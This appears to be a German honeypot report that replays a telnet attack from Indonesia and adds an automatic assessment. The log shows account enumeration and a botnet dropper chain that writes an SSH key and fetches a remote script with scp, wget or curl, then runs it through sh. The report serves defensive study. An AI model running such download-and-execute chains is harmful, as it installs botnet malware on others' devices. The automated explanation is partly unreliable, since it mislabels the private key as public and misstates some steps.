ALLSmartSecurity
Mitschnitt

Telnet-Angriff aus Indonesien: Schadcode nachladen und Benutzerliste auslesen

01.10.2026, 16:52 UTC · 16 Befehle · über telnet · Indonesien

Überblick

Dienst
telnet (Port 23)
Herkunft
Indonesien · PT Air Lintas Komunikasi
Probierte Zugangsdaten
admin / admin

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
admin@srv01: ~

admin@srv01:~$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
admin@srv01:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin
admin@srv01:~$ echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"
auth_ok
admin@srv01:~$ enable
bash: enable: command not found
admin@srv01:~$ system
bash: system: command not found
admin@srv01:~$ shell
bash: shell: command not found
admin@srv01:~$ sh
admin@srv01:~$ bash
admin@srv01:~$ cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY-----
bash: syntax error near unexpected token `||'
'-----BEGIN OPENSSH PRIVATE KEY-----
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ [Token]
bash: [Token]: No such file or directory
admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no
bash: syntax error near unexpected token `newline'
'StrictHostKeyChecking no
admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s telnet; fi; rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\…
bash: syntax error near unexpected token `newline'
redtail_bot_telnet_ok

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich über Telnet mit den Standardzugangsdaten admin und admin an. Nach einer kurzen Systemabfrage versuchte er, in eine tiefere Shell-Ebene zu wechseln. Anschließend lud er einen SSH-Schlüssel herunter und versuchte, eine Payload von einem externen Server zu beziehen und auszuführen.

Was die Befehle bewirken

Die Befehle id und cat /etc/passwd dienen der Identifikation des Benutzers und der Aufzählung lokaler Konten. Der Befehl echo erzeugt eine Datei mit einem öffentlichen SSH-Schlüssel im PEM-Format. Die Konfigurationsdatei sshcfg deaktiviert die Host-Key-Prüfung, um Man-in-the-Middle-Angriffe zu ermöglichen. Der scp-Befehl versucht, eine Datei über SSH zu übertragen, während wget oder curl als Fallback dienen, um eine Skriptdatei von einem IP-Server zu laden. Das Pipe-Zeichen leitet den Inhalt direkt an die Shell sh weiter, um das Skript ohne Zwischenspeicherung auszuführen.

Worauf es hinauslief

Das Ziel war vermutlich die Installation einer Backdoor oder eines Botnet-Clients auf dem Gerät. Dies erkennt man an dem Versuch, eine externe Datei namens out_sh herunterzuladen und direkt auszuführen. Der Einsatz eines SSH-Schlüssels deutet auf einen Versuch hin, persistente Zugänge zu schaffen oder weitere Systeme im Netzwerk zu kompromittieren.

Einordnung

Dieses Muster ist bei automatisierten Botnetzen sehr verbreitet, die IoT-Geräte mit schwachen Passwörtern scannen. Die Kombination aus Standard-Credentials und direkter Payload-Ausführung ist ein klassischer Indikator für massenhafte Angriffe.